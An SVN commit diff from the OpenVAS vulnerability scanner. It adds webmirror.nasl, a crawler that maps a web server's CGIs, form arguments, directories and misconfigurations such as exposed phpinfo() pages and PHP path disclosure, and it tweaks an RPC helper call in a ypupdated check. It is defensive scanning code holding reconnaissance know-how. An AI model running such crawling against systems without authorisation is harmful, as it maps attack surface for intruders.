+    new_args = cgi2hash(cgi:args);
+    common = make_list();
+    foreach c (keys(tmp))
+    {
+     common[c] = tmp[c];
+    }
+    
+    foreach c (keys(new_args))
+    {
+     if(isnull(common[c]))common[c] = new_args[c];
+    }
+    CGIs[cgi] = hash2cgi(hash:common);
+    }
+}
+
+
+
+#---------------------------------------------------------------------------#
+
+function dir(url)
+{
+ return ereg_replace(pattern:"(.*)/[^/]*", string:url, replace:"\1");
+}
+
+function remove_cgi_arguments(url)
+{
+ local_var idx, cgi, cgi_args, args, arg, a, b;
+ 
+ # Remove the trailing blanks
+ while(url[strlen(url) - 1] == " ")
+ {
+  url = substr(url, 0, strlen(url) - 2);
+ }
+ 
+ idx = stridx(url, "?");
+ if(idx < 0)
+  return url;
+ else if(idx >= strlen(url) - 1)
+ {
+  cgi = substr(url, 0, strlen(url) - 2);
+  add_cgi(cgi:cgi, args:"");
+  return cgi;
+ }
+ else
+ {
+  if(idx > 1)cgi = substr(url, 0, idx - 1);
+  else cgi = ".";
+  cgi_args = split(substr(url, idx + 1, strlen(url) - 1), sep:"&");
+  foreach arg (make_list(cgi_args)) 
+  {
+   arg = arg - "&";
+   arg = arg - "amp;";
+   a = ereg_replace(string:arg, pattern:"(.*)=.*", replace:"\1");
+   b = ereg_replace(string:arg, pattern:".*=(.*)", replace:"\1");
+   if(a != b)
+  	 args = string(args, a , " [", b, "] ");
+   else
+   	 args = string(args, arg, " [] ");
+  }
+  add_cgi(cgi:cgi, args:args);
+  return cgi;
+ }
+}
+
+
+function basename(name, level)
+{
+ local_var i;
+ 
+ if(strlen(name) == 0)
+  return NULL;
+  
+
+  for(i = strlen(name) - 1; i >= 0 ; i --)
+  {
+   if(name[i] == "/")
+   {
+    level --;
+    if(level < 0)
+    { 
+     return(substr(name, 0, i));
+    }
+   }
+ }
+ 
+ # Level is too high, we return /
+ return "/";
+}
+
+
+
+function canonical_url(url, current)
+{
+ local_var num_dots, i, location ;
+ 
+#debug = int(5);
+ 
+ if(debug > 1)display("***** canonical '", url, "' (current:", current, ")\n");
+ 
+ if(strlen(url) == 0)
+  return NULL;
+  
+ if(url[0] == "#")
+  return NULL;
+ 
+ 
+ if(url == "./" || url == ".")
+   return current;
+  
+
+ if(debug > 2)display("**** canonical(again) ", url, "\n");
+ 
+ if(ereg(pattern:"[a-z]*:", string:url, icase:TRUE))
+ {
+  if(ereg(pattern:"^http://", string:url, icase:TRUE))
+  {
+   location = ereg_replace(string:url, pattern:"http://([^/]*)/.*", replace:"\1", icase:TRUE);
+   if(location != url)
+   {
+    if(location != get_host_name())return NULL;
+    else return remove_cgi_arguments(url:ereg_replace(string:url, pattern:"http://[^/]*/([^?]*)", replace:"/\1", icase:TRUE));
+   }
+  }
+ }
+ else
+ {
+ if(url == "//")  return "/";
+
+ if(ereg(pattern:"^//.*", string:url, icase:TRUE))
+ {
+  location = ereg_replace(string:url, pattern:"//([^/]*)/.*", replace:"\1", icase:TRUE);
+  if(location != url)
+  {
+   if(location == get_host_name())return remove_cgi_arguments(url:ereg_replace(string:url, pattern:"//[^/]*/([^?]*)", replace:"/\1", icase:TRUE));
+  }
+  return NULL;
+ }
+ 
+ if(url[0] == "/")
+  return remove_cgi_arguments(url:url);
+ else
+ {
+  i = 0;
+  num_dots = 0;
+ 
+  while(i < strlen(url) - 2 && url[i] == "." && url[i+1] == "." && url[i+2] == "/")
+  {
+   num_dots ++;
+   url = url - "../";
+   if(strlen(url) == 0)break;
+  }
+  
+  while(i < strlen(url) && url[i] == "." && url[i+1] == "/")
+  {
+    url = url - "./";
+    if(strlen(url) == 0)break;
+  }
+  url = string(basename(name:current, level:num_dots), url);
+ }
+ 
+ i = stridx(url, "#");
+ if(i >= 0)url = substr(url, 0, i - 1);
+ 
+
+ if(url[0] != "/")
+ 	return remove_cgi_arguments(string("/", url));
+ else
+ 	return remove_cgi_arguments(url:url);
+ }
+ return NULL;
+}
+
+
+
+#--------------------------------------------------------------------#
+
+ 
+function my_http_get(item, port)
+{
+ local_var ret, accept, idx;
+ 
+ ret = http_get(item:page, port:port);
+ accept = egrep(string:ret, pattern:"^Accept:.*");
+ ret = ret - accept;
+ idx = stridx(ret, string("\r\n\r\n"));
+
+ 
+ ret = insstr(ret, string("\r\nAccept: text/html, text/xml\r\n\r\n"), idx);
+ return ret;
+}
+
+
+function extract_location(data)
+{
+ local_var loc, url;
+ 
+
+ 
+ loc = egrep(string:data, pattern:"^Location: ");
+ if(!loc) return NULL;
+ 
+ loc = loc - string("\r\n");
+ loc = ereg_replace(string:loc, 
+                              pattern:"Location: (.*)$",
+                              replace:"\1");
+ 
+ 
+ 
+  url = canonical_url(url:loc, current:"/"); 
+  if( url )
+  {
+   add_url(url : url);
+   return url;
+  }
+  
+  return NULL;
+}
+
+
+
+function retr( port, page )
+{
+ local_var req, resp, q;
+ 
+ if( debug )display("*** RETR ", page, "\n");
+  
+ req = my_http_get(item:page, port:port);
+ resp = my_http_keepalive_send_recv(port:port, data:req);
+ if( resp == NULL ) exit(0); # No web server
+ 
+ if(!match(pattern:"HTTP* 200 *", string:resp))
+ {
+  if(match(pattern:"HTTP* 401 *", string:resp) ||
+     match(pattern:"HTTP* 403 *", string:resp))
+     {
+      add_auth(url:page);
+      return NULL;
+     }
+  if(match(pattern:"HTTP* 301 *", string:resp) ||
+     match(pattern:"HTTP* 302 *", string:resp))
+  { 
+   q = egrep(pattern:"^Location:.*", string:resp);
+   add_30x(url:page);
+   
+   # Don't echo back what we added ourselves...
+   if(!(("?PageServices" >< page || "?D=A" >< page) && ("?PageServices" >< q || "?D=A" >< q)))
+   	extract_location(data:resp);
+   return NULL;
+  }
+ }
+ 
+ if(egrep(pattern:"^Server:.*Apache.*", string:resp))Apache ++;
+ else if(egrep(pattern:"^Server:.*Netscape.*", string:resp))iPlanet ++;
+ 
+ if(!egrep(pattern:"^Content-Type: text/(xml|html).*", string:resp))
+ 	return NULL;
+ else 
+ 	{
+	resp = strstr(resp, string("\r\n\r\n"));
+	if(!resp)return NULL; # Broken web server ?
+	resp = str_replace(string:resp, find:string("\r\n"), replace:" ");
+	resp = str_replace(string:resp, find:string("\n"), replace:" ");
+	resp = str_replace(string:resp, find:string("\t"), replace:" ");
+ 	return resp;
+	}
+}
+
+#---------------------------------------------------------------------------#
+
+
+function token_split(content)
+{
+ local_var i, j, k, str;
+ local_var ret, len, num;
+ 
+ num = 0;
+ 
+ ret = make_list();
+ len = strlen(content);
+ 
+ for (i=0;i<len;i++)
+ {
+  if(((i + 3) < len) && content[i]=="<" && content[i+1]=="!" && content[i+2]=="-" && content[i+3]=="-")
+  {
+   j = stridx(content, "-->", i);
+   if( j < 0)return(ret);
+   i = j;
+  }
+ else  
+  if(content[i]=="<")
+  {
+   str = "";
+   i ++;
+   
+   while(content[i] == " ")i ++;
+   
+   for(j = i; j < len ; j++)
+   {
+    if(content[j] == '"')
+    {
+      k = stridx(content, '"', j + 1);
+      if(k < 0){
+      	return(ret); # bad page
+	}
+      str = str + substr(content, j, k);
+      j = k;
+    }
+    else if(content[j] == '>')
+    {        
+     if(ereg(pattern:"^(a|area|frame|meta|iframe|link|img|form|/form|input|button|textarea|select|applet)( .*|$)", string:str, icase:TRUE))
+     	{
+        num ++;
+     	ret = make_list(ret, str);
+        if ( num > 50 ) return ret; # Too many items
+	}
+     break;
+    }
+    else str = str + content[j];
+   }
+   i = j;
+  }
+ }
+ 
+ return(ret);
+}
+
+
+
+function token_parse(token)
+{
+ local_var ret, i, j, len, current_word, word_index, current_value, char;
+ 
+ 
+ ret = make_list();
+ len = strlen(token);
+ current_word = "";
+ word_index = 0;
+ 
+ for( i = 0 ; i < len ; i ++)
+ {
+  if((token[i] == " ")||(token[i] == "="))
+  {
+   while(i+1 < len && token[i+1] == " ")i ++;
+   if(i >= len)break;
+   
+   if(word_index == 0)
+   {
+    ret["nasl_token_type"] = tolower(current_word);
+   }
+   else
+   {
+    while(i+1 < len && token[i] == " ")i ++;
+    if(token[i] != "=")
+    {
+    	 ret[tolower(current_word)] = NULL; 
+    }
+    else
+    {
+    	i++;
+	char = NULL;
+	if(i >= len)break;
+    	if(token[i] == '"')char = '"';
+	else if(token[i] == "'")char = "'";
+	
+	if(!isnull(char))
+ 	{
+	 j = stridx(token, char, i + 1);
+	 if(j < 0)
+	  {
+	  if(debug)display("PARSE ERROR 1\n");
+	  return(ret); # Parse error
+	  }
+	 ret[tolower(current_word)] = substr(token, i + 1, j - 1);
+	 while(j+1 < len &&  token[j+1]==" ")j++;
+	 i = j;
+	}
+        else
+        {
+         j = stridx(token, ' ', i + 1);
+	 if(j < 0)
+	  {
+	   j = strlen(token);
+	  }
+	 ret[tolower(current_word)] = substr(token, i, j - 1);
+	 i = j;
+       }
+     }
+   }
+    current_word = "";
+    word_index ++;
+  }
+  else {
+  	if(i < len)current_word = current_word + token[i];
+	}
+ }
+ 
+ if(!word_index)ret["nasl_token_type"] = tolower(current_word);
+ return ret;
+}
+
+
+#-------------------------------------------------------------------------#
+
+function parse_java(elements) 
+{
+    archive = elements["archive"];
+    code = elements["code"];
+    codebase = elements["codebase"];
+
+    if (codebase) 
+    {
+         if (archive)
+            set_kb_item(name:string("www/", port, "/java_classfile"), value:string(codebase,"/",archive));
+         if (code)
+             set_kb_item(name:string("www/", port, "/java_classfile"), value:string(codebase,"/",code));
+    } 
+    else 
+    {
+         if (archive)
+            set_kb_item(name:string("www/", port, "/java_classfile"), value:archive);
+         if (code)
+            set_kb_item(name:string("www/", port, "/java_classfile"), value:code);
+    }
+}
+
+
+
+
+
+
+
+function parse_javascript(elements, current)
+{
+  local_var url, pat;
+  
+  if(debug > 15)display("*** JAVASCRIPT\n");
+  
+  pat = string(".*window\\.open\\('([^',", raw_string(0x29), "]*)'.*\\)*");
+  url = ereg_replace(pattern:pat,
+  		     string:elements["onclick"],
+		     replace:"\1",
+		     icase:TRUE);
+		
+  	     
+  if( url == elements["onclick"])
+   return NULL;
+  
+  url = canonical_url(url:url, current:current); 
+  if( url )
+  {
+   add_url(url : url);
+   return url;
+  }
+  
+  return NULL;
+}
+
+
+function parse_dir_from_src(elements, current)
+{
+ local_var src, dir;
+ 
+ src = elements["src"];
+ if( ! src ) return NULL;
+ 
+ src = canonical_url(url:src, current:current);
+ dir = dir(url:src);
+ if(dir && !Dirs[dir])
+ {
+  Dirs[dir] = 1;
+  set_kb_item(name:string("www/", port, "/content/directories"), value:dir);
+  if(isnull(URLs_hash[dir]))
+   {
+    URLs = make_list(URLs, dir);
+    URLs_hash[dir] =  0;
+   }
+  }
+}
+
+
+function parse_href_or_src(elements, current)
+{
+ local_var href;
+ 
+ href = elements["href"];
+ if(!href)href = elements["src"];
+ 
+ if(!href){
+	return NULL;
+	}
+ 
+ href = canonical_url(url:href, current:current);
+ if( href )
+ {
+  add_url(url: href);
+  return href;
+ }
+}
+
+
+function parse_refresh(elements, current)
+{
+ local_var href, content, t, sub;
+ 
+ content = elements["content"];
+ 
+ if(!content)
+  return NULL;
+ t = strstr(content, ";");
+ if( t != NULL ) content = substr(t, 1, strlen(t) - 1);
+ 
+ content = string("a ", content);
+ sub = token_parse(token:content);
+ 
+ if(isnull(sub)) return NULL;
+ 
+ href = sub["url"];
+ if(!href)
+  return NULL;
+ 
+ href = canonical_url(url:href, current:current);
+ if ( href )
+ {
+  add_url(url: href);
+  return href;
+ }
+}
+
+
+function parse_form(elements, current)
+{
+ local_var action;
+ 
+ action = elements["action"];
+ 
+ action = canonical_url(url:action, current:current);
+ if ( action )
+   return action;
+ else 
+   return NULL;
+}
+
+
+function pre_parse(data, src_page)
+{
+    local_var php_path, fp_save, data2;
+
+    if ("Index of /" >< data)
+    {
+    	    if(!Misc[src_page])
+	    {
+	    if("?D=A" >!< src_page && "?PageServices" >!< src_page)
+	    	{
+             	 misc_report = misc_report + string("Directory index found at ", src_page, "\n");
+	   	 Misc[src_page] = 1;
+		 }
+	    }
+    }
+    
+    if ("<title>phpinfo()</title>" >< data)
+    {
+    	    if(!Misc[src_page])
+	    {
+            misc_report = misc_report + string("Extraneous phpinfo() script found at ", src_page, "\n"); 
+	    Misc[src_page] = 1;
+	    }
+            
+    }
+    
+    if("Fatal" >< data || "Warning" >< data)
+    {
+    data2 = strstr(data, "Fatal");
+    if(!data2)data2 = strstr(data, "Warning");
+    
+    data2 = strstr(data2, "in <b>");
+    
+    php_path = ereg_replace(pattern:"in <b>([^<]*)</b>.*", string:data2, replace:"\1");
+    if (php_path != data2)
+    {
+        if (!Misc[src_page])
+        {
+            misc_report = misc_report + string("PHP script discloses physical path at ", src_page, " (", php_path, ")\n");
+	    Misc[src_page] = 1;
+        }
+     }
+    }
+    
+   
+    data2 = strstr(data, "unescape");
+    
+    if(data2 && ereg(pattern:"unescape..(%([0-9]|[A-Z])*){200,}.*", string:data2))
+    {
+     if(!Misc[src_page])
+     {
+      misc_report += string(src_page, " seems to have been 'encrypted' with HTML Guardian\n");
+      guardian ++;
+     }
+    }
+    
+    if("CREATED WITH THE APPLET PASSWORD WIZARD WWW.COFFEECUP.COM" >< data)
+    {
+     if(!Misc[src_page])
+     {
+      misc_report += string(src_page, " seems to contain links 'protected' by CoffeCup\n");
+      coffeecup++;
+     }
+     
+      
+    }
+
+    if("SaveResults" >< data)
+    { 
+    fp_save = ereg_replace(pattern:string("(.*SaveResults.*U-File=)", quote, "(.*)", quote, ".*"), string:data, replace:"\2");
+    if (fp_save != data)
+     {
+        if (!Misc[src_page])
+        {
+            misc_report = misc_report + string("FrontPage form stores results in web root at ", src_page, " (", fp_save, ")\n");
+	    Misc[src_page] = 1;
+        }   
+     }
+   }
+}
+
+
+
+function parse_main(current, data)
+{
+ local_var tokens, elements, cgi, form_cgis, form_cgis_level, args, store_cgi;
+ 
+ form_cgis = make_list();
+ form_cgis_level = 0;
+ argz = NULL;
+ store_cgi = 0;
+ tokens = token_split(content: data);
+ foreach token (tokens)
+ {
+   elements = token_parse(token:token);
+   if(!isnull(elements))
+   {
+    
+    if(elements["onclick"])
+    	parse_javascript(elements:elements, current:current);
+
+    if ( elements["nasl_token_type"] == "applet")
+        parse_java(elements:elements);
+	
+    if(elements["nasl_token_type"] == "a" 	  || 
+       elements["nasl_token_type"] == "link" 	  ||
+       elements["nasl_token_type"] == "frame"	  ||
+       elements["nasl_token_type"] == "iframe"	  ||
+       elements["nasl_token_type"] == "area")
+        if( parse_href_or_src(elements:elements, current:current) == NULL) {
+	  if(debug > 20)display("ERROR - ", token, "\n");
+	  }
+    if(elements["nasl_token_type"] == "img")
+    	parse_dir_from_src(elements:elements, current:current);
+	
+    if(elements["nasl_token_type"] == "meta")
+    	parse_refresh(elements:elements, current:current);
+			  
+    if( elements["nasl_token_type"] == "form" )
+    {
+      cgi = parse_form(elements:elements, current:current);
+      if( cgi )
+      {
+       form_cgis[form_cgis_level] = cgi;
+       store_cgi = 1;
+      }
+      form_cgis_level ++;
+    }
+    
+   if( elements["nasl_token_type"] == "/form")
+    {
+     form_cgis_level --;
+     if( store_cgi != 0) add_cgi(cgi:form_cgis[form_cgis_level], args:argz);
+     argz = "";
+     store_cgi = 0;
+    } 
+   
+   if( elements["nasl_token_type"] == "input" ||
+       elements["nasl_token_type"] == "select")
+    {
+     if(elements["name"])
+    	 argz += string( elements["name"], " [", elements["value"], "] ");
+    }
+   }
+ }
+}
+
+
+#----------------------------------------------------------------------#
+#				MAIN()				       #
+#----------------------------------------------------------------------#
+
+
+
+start_page = script_get_preference("Start page : ");
+if(isnull(start_page) || start_page == "")start_page = "/";
+
+
+max_pages = int(script_get_preference( "Number of pages to mirror : " ));
+if(max_pages <= 0)max_pages = 30;
+
+dirs = get_kb_list(string("www/", port, "/content/directories"));
+
+
+num_cgi_dirs = 0;
+if ( thorough_tests ) max_cgi_dirs = 1024;
+else max_cgi_dirs = 16;
+
+
+
+debug = 0;
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+
+URLs = make_list(start_page);
+if(dirs) URLs = make_list(start_page, dirs);
+URLs_hash[start_page] = 0;
+
+
+Apache = 0;
+iPlanet = 0;
+
+CGIs = make_list();
+Misc = make_list();
+Dirs = make_list();
+
+CGI_Dirs_List = make_list();
+
+URLs_30x_hash = make_list();
+URLs_auth_hash = make_list();
+
+
+Code404 = make_list();
+
+misc_report = "";
+cnt = 0;
+
+RootPasswordProtected = 0;
+
+guardian  = 0;
+coffeecup = 0;
+
+foreach URL (URLs)
+{ 
+ if(!URLs_hash[URL])
+ {
+ 	page = retr(port:port, page:URL);
+	cnt ++;
+	pre_parse(src_page:URL, data:page);
+	parse_main(data:page, current:URL);
+ 	URLs_hash[URL] = 1;
+	if(cnt >= max_pages)break;
+ }
+}
+
+
+if(cnt == 1)
+{
+ if(RootPasswordProtected)
+ {
+  set_kb_item(name:string("www/", port, "/password_protected"), value:TRUE);
+ }
+}
+foreach URL (URLs)
+{
+ display(URL,"\n");
+}
+
+display("-----------------------------------------\n");
+
+
+report = "";
+
+foreach foo (keys(CGIs))
+{
+ args = CGIs[foo];
+ if(!args) args = "";
+ set_kb_item(name:string("www/", port, "/cgis"), value:string(foo, " - ", args));
+ 
+  
+ if(!report) 
+ 	report = string("The following CGI have been discovered :\n\nSyntax : cginame (arguments [default value])\n\n", foo, " (", args, ")\n");
+ else
+ 	report = string(report, foo, " (", args, ")\n");
+}
+
+if(misc_report)
+{ 
+
+ report =  string(report, "\n\n", misc_report);
+}
+
+
+if(guardian)
+{
+ report += string("
+ 
+HTML Guardian is a tool which claims to encrypt web pages, whereas it simply
+does a transposition of the content of the page. It is is no way a safe
+way to make sure your HTML pages are protected.
+
+See also : http://www.securityfocus.com/archive/1/315950
+BID : 7169");
+}
+
+
+if(coffeecup)
+{
+ report += "
+ 
+CoffeeCup Wizard is a tool which claims to encrypt links to web pages,
+to force users to authenticate before they access the links. However,
+the 'encryption' used is a simple transposition method which can be 
+decoded without the need of knowing a real username and password.
+
+BID : 6995 7023";
+}
+
+if(strlen(report))
+{
+ security_note(port:port, data:report);
+}
+


Property changes on: trunk/openvas-plugins/scripts/webmirror.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl
===================================================================
--- trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl	2009-10-02 11:10:27 UTC (rev 5357)
+++ trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl	2009-10-02 17:48:14 UTC (rev 5358)
@@ -50,7 +50,7 @@
  exit(0);
 }
 
-include("sunrpc_func.inc");
+include("misc_func.inc");
 
 g_timeout = 15;	# Must be greater than the maximum sleep value
 RPC_PROG = 100028;
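Review bot: Replacing `include("sunrpc_func.inc");` with `include("misc_func.inc");` removes the old include entirely, so any helper other than `get_rpc_port2` that the script still takes from it would now be undefined. The rest of the script lies outside these hunks, so that should be checked before merging. As far as I know, NASL reports an undefined function only when the call is reached, so a leftover call would abort the plugin mid-scan and the check would report nothing rather than fail loudly. The hunks at `@@ -116,7` and `@@ -126,7` make the matching call change to `get_rpc_port`. A one-line comment above the include, e.g. `# get_rpc_port() is provided by misc_func.inc`, would record the reason, since the ChangeLog entry only says "Bugfixes".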
@@ -116,7 +116,7 @@
 tcp_ports = get_kb_list('Services/RPC/ypupdated');
 if (isnull(tcp_ports))
 {
- port = get_rpc_port2(program: RPC_PROG, protocol: IPPROTO_TCP);
+ port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_TCP);
  if (port) tcp_ports = make_list(port);
 }
 
@@ -126,7 +126,7 @@
 udp_ports = get_kb_list('Services/udp/RPC/ypupdated');
 if (isnull(udp_ports))
 {
- port = get_rpc_port2(program: RPC_PROG, protocol: IPPROTO_UDP);
+ port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_UDP);
  if (port) udp_ports = make_list(port);
 }
 


